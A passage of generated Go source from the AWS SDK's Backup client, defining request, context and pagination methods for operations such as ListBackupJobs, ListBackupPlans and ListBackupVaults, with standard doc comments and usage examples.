Name: opGetSupportedResourceTypes,
HTTPMethod: "GET",
HTTPPath: "/supported-resource-types",
}
if input == nil {
input = &GetSupportedResourceTypesInput{}
}
output = &GetSupportedResourceTypesOutput{}
req = c.newRequest(op, input, output)
return
}
// GetSupportedResourceTypes API operation for AWS Backup.
//
// Returns the AWS resource types supported by AWS Backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetSupportedResourceTypes for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetSupportedResourceTypes
func (c *Backup) GetSupportedResourceTypes(input *GetSupportedResourceTypesInput) (*GetSupportedResourceTypesOutput, error) {
req, out := c.GetSupportedResourceTypesRequest(input)
return out, req.Send()
}
// GetSupportedResourceTypesWithContext is the same as GetSupportedResourceTypes with the addition of
// the ability to pass a context and additional request options.
//
// See GetSupportedResourceTypes for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetSupportedResourceTypesWithContext(ctx aws.Context, input *GetSupportedResourceTypesInput, opts ...request.Option) (*GetSupportedResourceTypesOutput, error) {
req, out := c.GetSupportedResourceTypesRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opListBackupJobs = "ListBackupJobs"
// ListBackupJobsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupJobs operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupJobs for more information on using the ListBackupJobs
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupJobsRequest method.
// req, resp := client.ListBackupJobsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupJobs
func (c *Backup) ListBackupJobsRequest(input *ListBackupJobsInput) (req *request.Request, output *ListBackupJobsOutput) {
op := &request.Operation{
Name: opListBackupJobs,
HTTPMethod: "GET",
HTTPPath: "/backup-jobs/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupJobsInput{}
}
output = &ListBackupJobsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupJobs API operation for AWS Backup.
//
// Returns a list of existing backup jobs for an authenticated account for the
// last 30 days. For a longer period of time, consider using these monitoring
// tools (https://docs.aws.amazon.com/aws-backup/latest/devguide/monitoring.html).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupJobs for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupJobs
func (c *Backup) ListBackupJobs(input *ListBackupJobsInput) (*ListBackupJobsOutput, error) {
req, out := c.ListBackupJobsRequest(input)
return out, req.Send()
}
// ListBackupJobsWithContext is the same as ListBackupJobs with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupJobs for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupJobsWithContext(ctx aws.Context, input *ListBackupJobsInput, opts ...request.Option) (*ListBackupJobsOutput, error) {
req, out := c.ListBackupJobsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupJobsPages iterates over the pages of a ListBackupJobs operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupJobs method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupJobs operation.
// pageNum := 0
// err := client.ListBackupJobsPages(params,
// func(page *backup.ListBackupJobsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupJobsPages(input *ListBackupJobsInput, fn func(*ListBackupJobsOutput, bool) bool) error {
return c.ListBackupJobsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupJobsPagesWithContext same as ListBackupJobsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupJobsPagesWithContext(ctx aws.Context, input *ListBackupJobsInput, fn func(*ListBackupJobsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupJobsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupJobsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupJobsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListBackupPlanTemplates = "ListBackupPlanTemplates"
// ListBackupPlanTemplatesRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupPlanTemplates operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupPlanTemplates for more information on using the ListBackupPlanTemplates
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupPlanTemplatesRequest method.
// req, resp := client.ListBackupPlanTemplatesRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanTemplates
func (c *Backup) ListBackupPlanTemplatesRequest(input *ListBackupPlanTemplatesInput) (req *request.Request, output *ListBackupPlanTemplatesOutput) {
op := &request.Operation{
Name: opListBackupPlanTemplates,
HTTPMethod: "GET",
HTTPPath: "/backup/template/plans",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupPlanTemplatesInput{}
}
output = &ListBackupPlanTemplatesOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupPlanTemplates API operation for AWS Backup.
//
// Returns metadata of your saved backup plan templates, including the template
// ID, name, and the creation and deletion dates.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupPlanTemplates for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanTemplates
func (c *Backup) ListBackupPlanTemplates(input *ListBackupPlanTemplatesInput) (*ListBackupPlanTemplatesOutput, error) {
req, out := c.ListBackupPlanTemplatesRequest(input)
return out, req.Send()
}
// ListBackupPlanTemplatesWithContext is the same as ListBackupPlanTemplates with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupPlanTemplates for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanTemplatesWithContext(ctx aws.Context, input *ListBackupPlanTemplatesInput, opts ...request.Option) (*ListBackupPlanTemplatesOutput, error) {
req, out := c.ListBackupPlanTemplatesRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupPlanTemplatesPages iterates over the pages of a ListBackupPlanTemplates operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupPlanTemplates method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupPlanTemplates operation.
// pageNum := 0
// err := client.ListBackupPlanTemplatesPages(params,
// func(page *backup.ListBackupPlanTemplatesOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupPlanTemplatesPages(input *ListBackupPlanTemplatesInput, fn func(*ListBackupPlanTemplatesOutput, bool) bool) error {
return c.ListBackupPlanTemplatesPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupPlanTemplatesPagesWithContext same as ListBackupPlanTemplatesPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanTemplatesPagesWithContext(ctx aws.Context, input *ListBackupPlanTemplatesInput, fn func(*ListBackupPlanTemplatesOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupPlanTemplatesInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupPlanTemplatesRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupPlanTemplatesOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListBackupPlanVersions = "ListBackupPlanVersions"
// ListBackupPlanVersionsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupPlanVersions operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupPlanVersions for more information on using the ListBackupPlanVersions
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupPlanVersionsRequest method.
// req, resp := client.ListBackupPlanVersionsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanVersions
func (c *Backup) ListBackupPlanVersionsRequest(input *ListBackupPlanVersionsInput) (req *request.Request, output *ListBackupPlanVersionsOutput) {
op := &request.Operation{
Name: opListBackupPlanVersions,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/versions/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupPlanVersionsInput{}
}
output = &ListBackupPlanVersionsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupPlanVersions API operation for AWS Backup.
//
// Returns version metadata of your backup plans, including Amazon Resource
// Names (ARNs), backup plan IDs, creation and deletion dates, plan names, and
// version IDs.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupPlanVersions for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanVersions
func (c *Backup) ListBackupPlanVersions(input *ListBackupPlanVersionsInput) (*ListBackupPlanVersionsOutput, error) {
req, out := c.ListBackupPlanVersionsRequest(input)
return out, req.Send()
}
// ListBackupPlanVersionsWithContext is the same as ListBackupPlanVersions with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupPlanVersions for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanVersionsWithContext(ctx aws.Context, input *ListBackupPlanVersionsInput, opts ...request.Option) (*ListBackupPlanVersionsOutput, error) {
req, out := c.ListBackupPlanVersionsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupPlanVersionsPages iterates over the pages of a ListBackupPlanVersions operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupPlanVersions method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupPlanVersions operation.
// pageNum := 0
// err := client.ListBackupPlanVersionsPages(params,
// func(page *backup.ListBackupPlanVersionsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupPlanVersionsPages(input *ListBackupPlanVersionsInput, fn func(*ListBackupPlanVersionsOutput, bool) bool) error {
return c.ListBackupPlanVersionsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupPlanVersionsPagesWithContext same as ListBackupPlanVersionsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanVersionsPagesWithContext(ctx aws.Context, input *ListBackupPlanVersionsInput, fn func(*ListBackupPlanVersionsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupPlanVersionsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupPlanVersionsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupPlanVersionsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListBackupPlans = "ListBackupPlans"
// ListBackupPlansRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupPlans operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupPlans for more information on using the ListBackupPlans
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupPlansRequest method.
// req, resp := client.ListBackupPlansRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlans
func (c *Backup) ListBackupPlansRequest(input *ListBackupPlansInput) (req *request.Request, output *ListBackupPlansOutput) {
op := &request.Operation{
Name: opListBackupPlans,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupPlansInput{}
}
output = &ListBackupPlansOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupPlans API operation for AWS Backup.
//
// Returns a list of existing backup plans for an authenticated account. The
// list is populated only if the advanced option is set for the backup plan.
// The list contains information such as Amazon Resource Names (ARNs), plan
// IDs, creation and deletion dates, version IDs, plan names, and creator request
// IDs.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupPlans for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlans
func (c *Backup) ListBackupPlans(input *ListBackupPlansInput) (*ListBackupPlansOutput, error) {
req, out := c.ListBackupPlansRequest(input)
return out, req.Send()
}
// ListBackupPlansWithContext is the same as ListBackupPlans with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupPlans for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlansWithContext(ctx aws.Context, input *ListBackupPlansInput, opts ...request.Option) (*ListBackupPlansOutput, error) {
req, out := c.ListBackupPlansRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupPlansPages iterates over the pages of a ListBackupPlans operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupPlans method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupPlans operation.
// pageNum := 0
// err := client.ListBackupPlansPages(params,
// func(page *backup.ListBackupPlansOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupPlansPages(input *ListBackupPlansInput, fn func(*ListBackupPlansOutput, bool) bool) error {
return c.ListBackupPlansPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupPlansPagesWithContext same as ListBackupPlansPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlansPagesWithContext(ctx aws.Context, input *ListBackupPlansInput, fn func(*ListBackupPlansOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupPlansInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupPlansRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupPlansOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListBackupSelections = "ListBackupSelections"
// ListBackupSelectionsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupSelections operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupSelections for more information on using the ListBackupSelections
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupSelectionsRequest method.
// req, resp := client.ListBackupSelectionsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupSelections
func (c *Backup) ListBackupSelectionsRequest(input *ListBackupSelectionsInput) (req *request.Request, output *ListBackupSelectionsOutput) {
op := &request.Operation{
Name: opListBackupSelections,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/selections/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupSelectionsInput{}
}
output = &ListBackupSelectionsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupSelections API operation for AWS Backup.
//
// Returns an array containing metadata of the resources associated with the
// target backup plan.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupSelections for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupSelections
func (c *Backup) ListBackupSelections(input *ListBackupSelectionsInput) (*ListBackupSelectionsOutput, error) {
req, out := c.ListBackupSelectionsRequest(input)
return out, req.Send()
}
// ListBackupSelectionsWithContext is the same as ListBackupSelections with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupSelections for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupSelectionsWithContext(ctx aws.Context, input *ListBackupSelectionsInput, opts ...request.Option) (*ListBackupSelectionsOutput, error) {
req, out := c.ListBackupSelectionsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupSelectionsPages iterates over the pages of a ListBackupSelections operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupSelections method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupSelections operation.
// pageNum := 0
// err := client.ListBackupSelectionsPages(params,
// func(page *backup.ListBackupSelectionsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupSelectionsPages(input *ListBackupSelectionsInput, fn func(*ListBackupSelectionsOutput, bool) bool) error {
return c.ListBackupSelectionsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupSelectionsPagesWithContext same as ListBackupSelectionsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupSelectionsPagesWithContext(ctx aws.Context, input *ListBackupSelectionsInput, fn func(*ListBackupSelectionsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupSelectionsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupSelectionsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupSelectionsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListBackupVaults = "ListBackupVaults"
// ListBackupVaultsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupVaults operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupVaults for more information on using the ListBackupVaults
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupVaultsRequest method.
// req, resp := client.ListBackupVaultsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupVaults
func (c *Backup) ListBackupVaultsRequest(input *ListBackupVaultsInput) (req *request.Request, output *ListBackupVaultsOutput) {
op := &request.Operation{
Name: opListBackupVaults,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupVaultsInput{}
}
output = &ListBackupVaultsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupVaults API operation for AWS Backup.
//
// Returns a list of recovery point storage containers along with information
// about them.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupVaults for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupVaults
func (c *Backup) ListBackupVaults(input *ListBackupVaultsInput) (*ListBackupVaultsOutput, error) {
req, out := c.ListBackupVaultsRequest(input)
return out, req.Send()
}
// ListBackupVaultsWithContext is the same as ListBackupVaults with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupVaults for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupVaultsWithContext(ctx aws.Context, input *ListBackupVaultsInput, opts ...request.Option) (*ListBackupVaultsOutput, error) {
req, out := c.ListBackupVaultsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupVaultsPages iterates over the pages of a ListBackupVaults operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupVaults method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupVaults operation.
// pageNum := 0
// err := client.ListBackupVaultsPages(params,
// func(page *backup.ListBackupVaultsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupVaultsPages(input *ListBackupVaultsInput, fn func(*ListBackupVaultsOutput, bool) bool) error {
return c.ListBackupVaultsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupVaultsPagesWithContext same as ListBackupVaultsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupVaultsPagesWithContext(ctx aws.Context, input *ListBackupVaultsInput, fn func(*ListBackupVaultsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupVaultsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupVaultsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupVaultsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListCopyJobs = "ListCopyJobs"
// ListCopyJobsRequest generates a "aws/request.Request" representing the
// client's request for the ListCopyJobs operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListCopyJobs for more information on using the ListCopyJobs
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListCopyJobsRequest method.
// req, resp := client.ListCopyJobsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListCopyJobs
func (c *Backup) ListCopyJobsRequest(input *ListCopyJobsInput) (req *request.Request, output *ListCopyJobsOutput) {
op := &request.Operation{
Name: opListCopyJobs,
HTTPMethod: "GET",
HTTPPath: "/copy-jobs/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListCopyJobsInput{}
}
output = &ListCopyJobsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListCopyJobs API operation for AWS Backup.
//
// Returns metadata about your copy jobs.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListCopyJobs for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListCopyJobs
func (c *Backup) ListCopyJobs(input *ListCopyJobsInput) (*ListCopyJobsOutput, error) {
req, out := c.ListCopyJobsRequest(input)
return out, req.Send()
}
// ListCopyJobsWithContext is the same as ListCopyJobs with the addition of
// the ability to pass a context and additional request options.
//
